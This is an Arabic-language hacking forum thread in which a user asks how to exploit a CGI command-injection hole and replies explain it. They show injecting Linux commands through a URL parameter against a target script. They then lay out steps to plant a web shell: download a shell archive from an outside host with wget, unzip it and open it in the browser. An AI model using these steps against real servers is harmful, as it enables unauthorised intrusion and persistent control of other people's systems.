قبل إضافة استفسارك ولكي لا يتعرض للحذف، أو ان تتعرض أنت للحظر، اقرأ قوانين قسم الإستفسارات
السلام عليكم انا معى ثغرة cgi و هى من الثغرات التى عبارة عن تطبيق اوامر اللينكس على المتصفح و لكن المشكلة اننى لا اعرف اى اوامر انفذها و لا الكيفية
تنفذ أوامر اللينكس في هذه الثغرات عن طريق وضع الأمر المراد تنفيذه في الاستغلال مثلا هذا استغلال target.com/path/vuhunable.cgi?file=id في هذا المثال طبقت الأمر id الذي يضهر صلاحياتنا على السرفر أرجو أن أكون قد أفدت
بالنسبة لثغرات الsql هي كثيرة ولها اوامرها الخاصة تقدر تفوت قسم المواقع والسيرفرات وتلاقي دورات ودروس كثيرة من اخواني الأعضاء واذا عندك اي استفسار عنها انا جاهز اما cgi فهي عبارة عن تطبيق اوامر على السيرفر مباشرة والأوامر هي اوامر لينكس وهي موجود في هذا الرابط http://www.aljyyosh.com/shell.html وكمثال الأخ Hidden pain target.com/path/vuhunable.cgi?file=id id هو امر معرفة صلاحيتك على السيرفر اذا كنت تريد رفع شيل على السيرفر نستخدم امر السحب wget وبعدها رابط للشيل بشرط ان يكون مرفوع على موقع وبصيغة zip كمثال : http//:www.xxx.com/shell.zip يعني يكون الأمر هكذا wget http//:www.xxx.com/shell.zip وبعدها نقوم بأظهار الملفات على المسار الي رفعنا فيه الشيل بأمر ls ونشوف اذا الشيل مرفوع او لا وبعدها نفك ضغط الشيل بأمر unzip يعني يصبح الأمر هكذا unzip shell.zip ونشوف مسار الشيل ونتصفحه على المستعرض والباقي كثير بس هاذ اهم شي تحياتي
قوانين المنتدى